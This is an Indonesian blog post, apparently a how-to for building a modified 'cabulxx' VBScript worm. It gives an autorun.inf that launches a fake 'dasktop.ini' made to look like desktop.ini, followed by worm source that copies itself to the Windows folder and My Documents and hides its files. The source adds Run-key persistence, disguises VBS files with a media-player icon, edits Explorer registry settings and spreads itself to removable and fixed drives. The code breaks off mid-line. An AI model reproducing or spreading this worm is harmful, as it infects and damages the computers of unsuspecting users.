Sama seperti pembahasan sebelumnya mari kita buat virus kembali, dari script virus cabulxx. Yang sedikit modifikasi.. Tahap pertama membuat virus adalah kita harus memiliki autorun.. Nah dibawah ini script autorunnya,
script begin
----------------------
[autorun]
shellexecute=wscript.exe //e:VBScript dasktop.ini auto
action=Open folder to view file
shell\open\command=wscript.exe //e:VBScript dasktop.ini auto
icon=%systemroot%\shell32.dll,4
file ini sebagai autorun file samaran file asli windows destop.ini yang disamarkan jadi dastop.ini. Copy paste file diatas save as allfile save sebagai autorun.inf
nah dibwh ini scrit destop.INI palsu
script begin
----------------------
on error resume next
set fs=createobject("scripting.filesystemobject")
set b3b15cR17T=fs.getfile(wscript.scriptfullname)
b3b15cR17Trn="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"action=Open folder to view file"&vbcrlf&"shell\open\command=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"icon=%systemroot%\shell32.dll,4"
set b3b15cR17Ttx=b3b15cR17T.openastextstream(1,-2)
do while not b3b15cR17Ttx.atendofstream
b3b15cR17Tv=b3b15cR17Tv&b3b15cR17Ttx.readline
b3b15cR17Tv=b3b15cR17Tv&vbcrlf
loop
do
set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=32
set my63615cR1p7=fs.createtextfile(b3b15cR17Th &"\myName.bat")
my63615cR1p7.writeline "@echo off"
my63615cR1p7.writeline "echo ######### ## ## ## ##### ### ########### ########"
my63615cR1p7.writeline "echo ############ ## ### #### ####### #### ######## ##########"
my63615cR1p7.writeline "echo ## ### ## ## ##### #### # ##"
my63615cR1p7.writeline "echo ## ## ## ## ###### #### # ##"
my63615cR1p7.writeline "echo ### ### ## ## ## ###### #### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ## ## ### ####"
my63615cR1p7.writeline "echo ## ## ######### #### ## ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ####### # ##"
my63615cR1p7.writeline "echo ### ### ## ###### ## #### ### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## # ####"
my63615cR1p7.writeline "echo ############ ########## #### #### ####"
my63615cR1p7.writeline "echo ######### ####### ### ########"
my63615cR1p7.writeline "maafkan aku mencintaimu [verion: 21-09-2009]"
my63615cR1p7.writeline "pause"
my63615cR1p7.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=39
set DB5cR1p7x93nT=createobject("WScript.Shell")
docf=DB5cR1p7x93nT.specialfolders("MyDocuments")
sCr1p7x93nT3v1L=docf & "\dian sastrowardoyo"
if not fs.folderexists(sCr1p7x93nT3v1L) then
set crfolder=fs.createfolder(sCr1p7x93nT3v1L)
end if
set b3b15cR17Tfn=fs.createtextfile(sCr1p7x93nT3v1L & "\midori.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set DB5cR1p7x93nT = createobject("WScript.Shell")
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winsoc","c:\Windows\winsoc.vbs","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xGentn4m3","c:\Windows\myName.bat","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","C:\Program Files\Windows Media Player\wmplayer.exe,1","REG_SZ"
almreg = "HKCU\Software\Policies\Microsoft\Windows\System\"
DB5cR1p7x93nT.RegWrite almreg & "DisableCMD","0", "REG_DWORD"
almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableTaskMgr","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableMsConfig","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableRegistryToo0s","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\Hidden","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\HideFileExt","0","REG_DWORD"
DB5cR1p7x93nT.Regwrite almreg & "Explorer\Advanced\ShowSuperHidden","0x00000001"
almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"
DB5cR1p7x93nT.RegWrite almreg & "NoRun", "0", "REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "NoFolderOptions", "0", "REG_DWORD"
set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.attributes=32
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.attributes=39
set b3b15cR17Twsl=createobject("wscript.shell")
b3b15cR17Tdc=b3b15cR17Twsl.specialfolders("MyDocuments")
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdc &"\diansastro.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
for each b3b15cR17Tdrive in fs.drives
if (b3b15cR17Tdrive.drivetype=1 or b3b15cR17Tdrive.drivetype=2) and b3b15cR17Tdrive.path<>"A:" then
set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\dasktop.ini")
b3b15cR17Tfn.attributes=32
set b3b15cR17Tfn=fs.cre
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar